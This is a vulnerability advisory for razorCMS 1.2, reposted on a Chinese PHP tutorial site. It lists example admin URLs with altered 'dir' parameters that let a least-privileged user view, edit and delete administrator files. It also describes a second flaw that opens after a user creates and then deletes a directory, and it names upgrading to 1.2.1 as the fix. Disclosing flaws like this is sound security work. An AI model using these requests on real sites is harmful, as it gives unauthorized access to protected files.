网站地图    收藏   

主页 > 后端 > 网站安全 >

razorCMS 1.2路径遍历 - 网站安全 - 自学php

来源:自学PHP网    时间:2015-04-17 13:03 作者: 阅读:

[导读] 标题: razorCMS 1.2 Path Traversal作者: chap0下载地址: http://www.razorcms.co.uk/archive/core/影响版本: 1.2测试平台: Ubuntu补丁: Upgrade to latest release 1.2.1RazorCMS is vulnerable......

标题: razorCMS 1.2 Path Traversal
作者: chap0
下载地址: http://www.razorcms.co.uk/archive/core/
影响版本: 1.2
测试平台: Ubuntu
补丁: Upgrade to latest release 1.2.1
 
 
RazorCMS is vulnerable to Path Traversal, when logged in with
a least privileged user account the user can access the
administrator's and super administrator's directories and
files by changing the path in the url. The vulnerabilities exist
in admin_func.php
 
 
Path Traversal Details:
 
The following files and directories are vulnerable to Path Traversal
Attack including any files or directories that the admin or super admin
may create within these directories
 
http://www.2cto.com /admin/?action=filemanview&dir=razor_temp_logs/
http://www.2cto.com /admin/?action=filemanview&dir=backup/
http://www.2cto.com /admin/?action=filemanview&dir=/razor_data.txt
http://www.2cto.com /admin/?action=filemanview&dir=/index.htm
 
 
http://www.2cto.com /admin/?action=fileman&dir=razor_temp_logs/
http://www.2cto.com /admin/?action=fileman&dir=backup/
http://www.2cto.com /admin/?action=fileman&dir=/razor_data.txt
http://www.2cto.com /admin/?action=fileman&dir=/index.htm
 
 
An example would be if the super admin created a directory within razor_temp_logs
named sekrit which should not be accessible with a least privileged user, the
least privileged user can change the path as shown below:
 
http://www.2cto.com /admin/?action=filemanview&dir=razor_temp_logs/sekrit/
 
Which also works on files within those directories which the user should not have
access to which at this point gives the user access to view, edit, rename, move,
copy and delete the file.
 
示例.
 
http://www.2cto.com /admin/?action=filemanview&dir=razor_temp_logs/sekrit/sekrit.txt
 
 
Another vulnerability exist in this version of razorCMS, if a least privileged user creates
a directory with their logged in credentials, and then deletes the directory, the user will
then have access to the administrative directories and files.

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论